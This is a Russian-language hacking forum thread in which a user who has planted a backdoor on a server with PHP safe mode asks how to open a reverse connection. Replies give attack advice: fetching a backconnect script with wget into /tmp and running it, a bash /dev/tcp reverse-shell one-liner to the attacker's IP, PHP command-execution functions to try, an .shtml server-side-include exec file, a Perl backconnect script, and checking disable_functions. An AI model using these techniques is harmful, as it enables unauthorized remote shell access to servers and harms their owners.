Backconnect через бекдор

Discussion in 'Песочница' started by OxoTnik, 25 Jan 2013.

  1. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    На сервере не работает ни 1 шел, сейф мод включен


    Вопрос:
    Как через бекдор, сделать бекконект, не имея шела?



    Пытался залить скрипт бэкконекта, и запустить командой

    Но увы не получилось, какие ещё есть способы?
     
    #1 OxoTnik, 25 Jan 2013
    Last edited: 25 Jan 2013
  2. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Залей через wget бэкконект в /tmp, переместись из текущего каталога в папку /tmp: cd /tmp, дай права на выполнение и запускай.
    P.S. возможно не работает команда system, попробуй другие.
     
  3. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    passthru, system, exec, shell_exec
     
  4. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Покури вот в этом ключе:
    /bin/bash < /dev/tcp/ourip/port &>/dev/tcp/ourip/port
     
  5. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Скорее всего у него отключены функции для выполнения системных команд
     
  6. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    А они вовсе не обязательны. Судя по всему есть возможность аплоадить файлы, но вследствие жестких ограничений на php, стандартные шелы не работают. Можно попробовать залить .shtml файл вида <!--#exec cmd="system command" --> и в его контексте выполнить вышеуказанную схему. Правда там надо немного покопать гугл, есть нюансы при провешивании обратного соединения таким образом.
     
  7. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    shtml шелл
    еще команды, позволяющие выполнить команду - proc_open, popen
     
  8. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Тогда зиливай перловский скрипт на backconnect и через него додалбливай.
     
  9. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    выведи значение disable_functions
     
    1 person likes this.